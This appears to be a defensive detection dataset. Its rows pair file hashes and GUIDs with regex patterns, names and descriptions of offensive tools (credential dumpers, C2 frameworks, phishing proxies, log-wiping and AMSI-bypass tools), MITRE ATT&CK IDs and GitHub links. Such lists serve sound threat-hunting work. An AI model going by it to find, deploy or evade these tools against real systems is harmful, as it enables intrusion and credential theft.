"*48a7ca531d14b205dfcaaa59b86e78f3f092a2c1c6ccf8c827ee87ba30d3108c*",".{0,1000}48a7ca531d14b205dfcaaa59b86e78f3f092a2c1c6ccf8c827ee87ba30d3108c.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*48ca254a725d1c4b6422cde2faa8777559f1513bc9bc032f05ee433be8b5fc55*",".{0,1000}48ca254a725d1c4b6422cde2faa8777559f1513bc9bc032f05ee433be8b5fc55.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*48caf6ffe4985e7541b9d34e8b6946d8c99e9d87cb46d146c81029fa280c03ba*",".{0,1000}48caf6ffe4985e7541b9d34e8b6946d8c99e9d87cb46d146c81029fa280c03ba.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*48f877f4424e0357e506fb65e0b673e495a092c3e1a2b0a010451defbb46c817*",".{0,1000}48f877f4424e0357e506fb65e0b673e495a092c3e1a2b0a010451defbb46c817.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*491012428e225b620985e8fc2af087fe8b85ccd9c9cc0a37bd1385b62f317bbe*",".{0,1000}491012428e225b620985e8fc2af087fe8b85ccd9c9cc0a37bd1385b62f317bbe.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*494072da9b54381c4b40e55e6131db414797d450b562a67c45168fb3bb46a07c*",".{0,1000}494072da9b54381c4b40e55e6131db414797d450b562a67c45168fb3bb46a07c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*4955d7e8fc3d3ded8e3b95757c78b3c4cd969b5fbb92a65267e6141b8faa83d5*",".{0,1000}4955d7e8fc3d3ded8e3b95757c78b3c4cd969b5fbb92a65267e6141b8faa83d5.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","0","N/A","N/A","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*4962402d7407375db7e69c2d731aec97649668214c27c82b46971733a902ac0b*",".{0,1000}4962402d7407375db7e69c2d731aec97649668214c27c82b46971733a902ac0b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*497CA37F-506C-46CD-9B8D-F9BB0DA34B95*",".{0,1000}497CA37F\-506C\-46CD\-9B8D\-F9BB0DA34B95.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*4984f4ee968fc246b4df6e9d6552753a98e4762c8cc95cd9693ffa815479d8f7*",".{0,1000}4984f4ee968fc246b4df6e9d6552753a98e4762c8cc95cd9693ffa815479d8f7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*49cf02eb8f76329b62378b8e9b0ae5abbe0312b9f2c3e068dbdf57f9474dfd8c*",".{0,1000}49cf02eb8f76329b62378b8e9b0ae5abbe0312b9f2c3e068dbdf57f9474dfd8c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*49df12075c49bb956291cd11b2c53626174b4128309ada438d5d5e49265866f9*",".{0,1000}49df12075c49bb956291cd11b2c53626174b4128309ada438d5d5e49265866f9.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","file_hash","7","7","657","98","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" "*4a4dbfa07c6f4a72b6727c4a2ed8ef2899f61f724a9b5d142ab30b1c283a6db8*",".{0,1000}4a4dbfa07c6f4a72b6727c4a2ed8ef2899f61f724a9b5d142ab30b1c283a6db8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*4a8e184ca9e1ccc775b224a48d344ce13dde26a86a634df2853ce7a27c17765c*",".{0,1000}4a8e184ca9e1ccc775b224a48d344ce13dde26a86a634df2853ce7a27c17765c.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002?","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","N/A","10","10","1024","151","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z" "*4aa27ae37edfbfe57f3ab989d192caf21b3c871516958eb77205c9ad700c3f67*",".{0,1000}4aa27ae37edfbfe57f3ab989d192caf21b3c871516958eb77205c9ad700c3f67.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*4ab0e8086598b7691fd17afbfa4a1cd79b3a13a9001a791c15a9f30afd43d13e*",".{0,1000}4ab0e8086598b7691fd17afbfa4a1cd79b3a13a9001a791c15a9f30afd43d13e.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*4b1b36706c5306f0084713e926888ffbe0fe9bfbf1b0bdfeef950b6dc531cb18*",".{0,1000}4b1b36706c5306f0084713e926888ffbe0fe9bfbf1b0bdfeef950b6dc531cb18.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*4b591b30acc45d581d7500bd107dea8155d325d3d8147d9cd4bd6c6aa3db7a98*",".{0,1000}4b591b30acc45d581d7500bd107dea8155d325d3d8147d9cd4bd6c6aa3db7a98.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*4b7d328edcfaba732d45ab408f53cf991d87f3e0a2dc2c0adc203885a0361d52*",".{0,1000}4b7d328edcfaba732d45ab408f53cf991d87f3e0a2dc2c0adc203885a0361d52.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*4ba56c35ad47ef4c0f778c152717296d353945b500448a332fb533ef5bdaf36e*",".{0,1000}4ba56c35ad47ef4c0f778c152717296d353945b500448a332fb533ef5bdaf36e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*4bb2d035f0972ef95a71600220648cffcc25c8f6baf5c96de7a0eafdf509ae04*",".{0,1000}4bb2d035f0972ef95a71600220648cffcc25c8f6baf5c96de7a0eafdf509ae04.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*4bd5b2fdb9820e93e3b29014d3902ca9f69c0306274c8cc4723ed606116d9a50*",".{0,1000}4bd5b2fdb9820e93e3b29014d3902ca9f69c0306274c8cc4723ed606116d9a50.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*4bff519a79e681ee5bb9b4ef66794344224c2084b36cd947ac29646a5687ab64*",".{0,1000}4bff519a79e681ee5bb9b4ef66794344224c2084b36cd947ac29646a5687ab64.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*4c069fe55bd14ff52667766cd057196992b0275c78a2d8d7139b7d57c90234fa*",".{0,1000}4c069fe55bd14ff52667766cd057196992b0275c78a2d8d7139b7d57c90234fa.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*4c0700a6f8d222d9b2023a800e0f286fc43e0354ec23ea21f9344adfd2fe12c8*",".{0,1000}4c0700a6f8d222d9b2023a800e0f286fc43e0354ec23ea21f9344adfd2fe12c8.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1059 - T1547 - T1068 - T1562 - T1110 - T1083 - T1021 - T1071","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","0","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*4c1c75f1a66eab31836ec53726fc47591a534688e79a5818ef63c1682de88cd5*",".{0,1000}4c1c75f1a66eab31836ec53726fc47591a534688e79a5818ef63c1682de88cd5.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*4c33b97878d1d543f60ca27673d99dc8b420628820ce29a6ff9d658f410254a5*",".{0,1000}4c33b97878d1d543f60ca27673d99dc8b420628820ce29a6ff9d658f410254a5.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*4c368fe58781e363b1176be2a6efcfaaa74432309d1cfc251174a5650debfbe8*",".{0,1000}4c368fe58781e363b1176be2a6efcfaaa74432309d1cfc251174a5650debfbe8.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","N/A","10","10","1302","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z" "*4C3B106C-8782-4374-9459-851749072123*",".{0,1000}4C3B106C\-8782\-4374\-9459\-851749072123.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","2","144","32","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z" "*4c3d4cbeec3d722929d86c0bf19108b3eac090fc5dc8fcde2cf818ff16e6fc5b*",".{0,1000}4c3d4cbeec3d722929d86c0bf19108b3eac090fc5dc8fcde2cf818ff16e6fc5b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*4C574B86-DC07-47EA-BB02-FD50AE002910*",".{0,1000}4C574B86\-DC07\-47EA\-BB02\-FD50AE002910.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*4c89adb840e2c8c3dfba56ae1eda0447046bcf0796108ffc1c2d446fa3c5a200*",".{0,1000}4c89adb840e2c8c3dfba56ae1eda0447046bcf0796108ffc1c2d446fa3c5a200.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*4c8e4b74f3326949830cf3974abc31a71852f557ae1bb9d0f4bfc1a92eb95b01*",".{0,1000}4c8e4b74f3326949830cf3974abc31a71852f557ae1bb9d0f4bfc1a92eb95b01.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*4c9c4d9df645d45510841d2edd07bd156bbb7ecd268626895f9b4d5ac8483633*",".{0,1000}4c9c4d9df645d45510841d2edd07bd156bbb7ecd268626895f9b4d5ac8483633.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*4caedf29083d75d0d6687f56981fda77cce0849f*",".{0,1000}4caedf29083d75d0d6687f56981fda77cce0849f.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*4cc3c88b175e7c6c9e881707ab3a6b956c7cbcb69a5f61d417d4736f054677b4*",".{0,1000}4cc3c88b175e7c6c9e881707ab3a6b956c7cbcb69a5f61d417d4736f054677b4.{0,1000}","offensive_tool_keyword","DNS-Tunnel-Keylogger","Keylogging server and client that uses DNS tunneling/exfiltration to transmit keystrokes","T1056.001 - T1048.003","TA0009 - TA0011","N/A","N/A","Collection","https://github.com/Geeoon/DNS-Tunnel-Keylogger","1","0","N/A","9","2","196","31","2024-04-13T13:58:04Z","2024-01-10T17:25:58Z" "*4cd39fb92aaed08de5753a2d62d3ee8c29b9f97ba81b7ba674787a3cbc3bf02e*",".{0,1000}4cd39fb92aaed08de5753a2d62d3ee8c29b9f97ba81b7ba674787a3cbc3bf02e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*4cec28b4c00002245dffc8346be0cc11*",".{0,1000}4cec28b4c00002245dffc8346be0cc11.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","7","4","309","66","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "*4D1B765D-1287-45B1-AEDC-C4B96CF5CAA2*",".{0,1000}4D1B765D\-1287\-45B1\-AEDC\-C4B96CF5CAA2.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","5","452","69","2024-04-19T20:15:04Z","2023-07-24T13:59:16Z" "*4d206acc72c76a9e6edcd57584b1fcd3094609212e15ba7f4afb4a9cde3534a1*",".{0,1000}4d206acc72c76a9e6edcd57584b1fcd3094609212e15ba7f4afb4a9cde3534a1.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*4d24f3932f028ac9d06c80770c3390ec3ce163d6e07344b4e3daa9c93061192d*",".{0,1000}4d24f3932f028ac9d06c80770c3390ec3ce163d6e07344b4e3daa9c93061192d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*4d262988fe9d252191947ab780535d496ed24fa27668cf76c6cb9b6474a391c4*",".{0,1000}4d262988fe9d252191947ab780535d496ed24fa27668cf76c6cb9b6474a391c4.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*4d2f66539f067f631db31039ec81707028bb37efcd2ebbf86a1a920d60d75263*",".{0,1000}4d2f66539f067f631db31039ec81707028bb37efcd2ebbf86a1a920d60d75263.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" 